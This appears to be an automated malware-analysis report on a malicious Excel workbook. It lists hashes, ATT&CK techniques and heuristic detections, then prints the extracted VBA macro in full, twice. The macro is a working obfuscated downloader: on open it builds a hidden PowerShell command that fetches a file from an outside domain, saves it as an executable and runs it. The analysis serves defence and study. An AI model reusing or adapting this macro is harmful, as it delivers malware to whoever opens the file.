Office (OLE) malware analysis — malicious · fbff0085c5754dbd

MALICIOUS

Office (OLE)

41.5 KB Created: 2017-10-19 07:59:05 Authoring application: Microsoft Excel First seen: 2019-04-17

MD5: 950c5f9cf4d0ebe0de24e9d0437228c4 SHA-1: f20e6c569ab1867d54fdeee7248f5ca03ddc85ba SHA-256: fbff0085c5754dbd39eab17c6133ac85773e1b12cb64db646cc0475f4737fa4c

280 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample contains a Workbook_Open VBA macro that is designed to execute a second-stage payload. The macro reassembles a PowerShell command to download a file from 'http://5z6d0mK6.com/footerlogo1.gif' and save it as an executable. The use of Shell() and cmd.exe references, along with the obfuscated PowerShell command, indicates a downloader functionality.

Heuristics 6

ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2775 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2775 bytes
SHA-256: `ea03e324540f392a81be642fa2bf6402d31052d9065cf9fe5f548f57d7b739a0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub Workbook_Open() Dim honadodd As String Randomize honadodd = Int(Rnd * 9005412#) If msoShadowStyleOuterShadow > 0.3 Then polebilless = honadodd defelleiss = "(\""{0" + "}{2" demiokilos = bokkerangel + polebilless + ".ex" + "e""" frontdeskcool = defelleiss + "}{1}" + "{3}{" + moorcodeone + "ze" + "rau" + "m.co" + "m/fo" + "oterl" + "ogo1.g" + "if\"",\""$Des\" + polebilless + ".e" + "xe\"")" + "}" sebikolhhe = unniliverus + backrunto + frontdeskcool + demiokilos Shell sallasaoko + sebikolhhe, contverresError End If End Sub Function vangaruby() vangaruby = "wN" + "loA" + "DfI" + theameouter + "OK" + "E(" + "\""htt" End Function Function unniliverus() unniliverus = "$7d0mK6 = [TyP" + "E](\""{1}{0}{" + "3}{2}\"" -f 'on','E" + "NVIr','Nt','mE') ; " End Function Function wallandwall() wallandwall = "'Sy','" + "te'," + "'s','m" + ".Ne','en" + "t','t.W" + "e" + "b','C" End Function Function sallasaoko() If 34 <> 0 Then sallasaoko = "CMd /c""POwe" + "rSheLL -n" + "olO -e" + "xEcu b" + "ypAss -nO" + "NI -nO" + "prOF" + "i -wi" + "Nd HiD" + "DeN """ End If End Function Function moorcodeone() moorcodeone = "5}{6" + "}{" + "4}\""-f" + wallandwall + "Li')" + ").dO" + vangaruby + "p:/" + "/" End Function Function bokkerangel() If 71 <> 0 Then bokkerangel = "while(!" + "${?});&(\""{0" + "}{2}{3}{1}\""-" + "f 'St'" + ",'o" + "cess','a" + "rt','-Pr') $Des\" End If End Function Function theameouter() theameouter = "LE.i" + "nV" End Function Function underwaterpool() underwaterpool = "0mk6:" + ":geTF" + "olDe" + sollertohaa + "H(" + "\""D" + "es" + "kt" + "op" + "\"");(" End Function Function backrunto() backrunto = "do{&(\""{1" + "}{0}\"" -f'ep','sle') 33;${D`es} = $7d" + underwaterpool + "&(\""{" + "0}{1}{2}\"" -f'Ne','w-','O" + "bj" + "ect') " End Function Function sollertohaa() sollertohaa = "RPA" + "t" End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: ea03e324540f392a81be642fa2bf6402d31052d9065cf9fe5f548f57d7b739a0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


































































































































Sub Workbook_Open()
Dim honadodd As String
Randomize
honadodd = Int(Rnd * 9005412#)
If msoShadowStyleOuterShadow > 0.3 Then
polebilless = honadodd
defelleiss = "(\""{0" + "}{2"
demiokilos = bokkerangel + polebilless + ".ex" + "e"""
frontdeskcool = defelleiss + "}{1}" + "{3}{" + moorcodeone + "ze" + "rau" + "m.co" + "m/fo" + "oterl" + "ogo1.g" + "if\"",\""$Des\" + polebilless + ".e" + "xe\"")" + "}"
sebikolhhe = unniliverus + backrunto + frontdeskcool + demiokilos
Shell sallasaoko + sebikolhhe, contverresError
End If
End Sub
Function vangaruby()
vangaruby = "wN" + "loA" + "DfI" + theameouter + "OK" + "E(" + "\""htt"
End Function
Function unniliverus()
unniliverus = "$7d0mK6 = [TyP" + "E](\""{1}{0}{" + "3}{2}\"" -f 'on','E" + "NVIr','Nt','mE') ;  "
End Function
Function wallandwall()
wallandwall = "'Sy','" + "te'," + "'s','m" + ".Ne','en" + "t','t.W" + "e" + "b','C"
End Function
Function sallasaoko()
If 34 <> 0 Then
sallasaoko = "CMd    /c""POwe" + "rSheLL -n" + "olO -e" + "xEcu  b" + "ypAss  -nO" + "NI -nO" + "prOF" + "i -wi" + "Nd  HiD" + "DeN     """
End If
End Function
Function moorcodeone()
moorcodeone = "5}{6" + "}{" + "4}\""-f" + wallandwall + "Li')" + ").dO" + vangaruby + "p:/" + "/"
End Function
Function bokkerangel()
If 71 <> 0 Then
bokkerangel = "while(!" + "${?});&(\""{0" + "}{2}{3}{1}\""-" + "f 'St'" + ",'o" + "cess','a" + "rt','-Pr') $Des\"
End If
End Function
Function theameouter()
theameouter = "LE.i" + "nV"
End Function
Function underwaterpool()
underwaterpool = "0mk6:" + ":geTF" + "olDe" + sollertohaa + "H(" + "\""D" + "es" + "kt" + "op" + "\"");("
End Function
Function backrunto()
backrunto = "do{&(\""{1" + "}{0}\"" -f'ep','sle') 33;${D`es} =  $7d" + underwaterpool + "&(\""{" + "0}{1}{2}\"" -f'Ne','w-','O" + "bj" + "ect') "
End Function

Function sollertohaa()
sollertohaa = "RPA" + "t"
End Function








Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.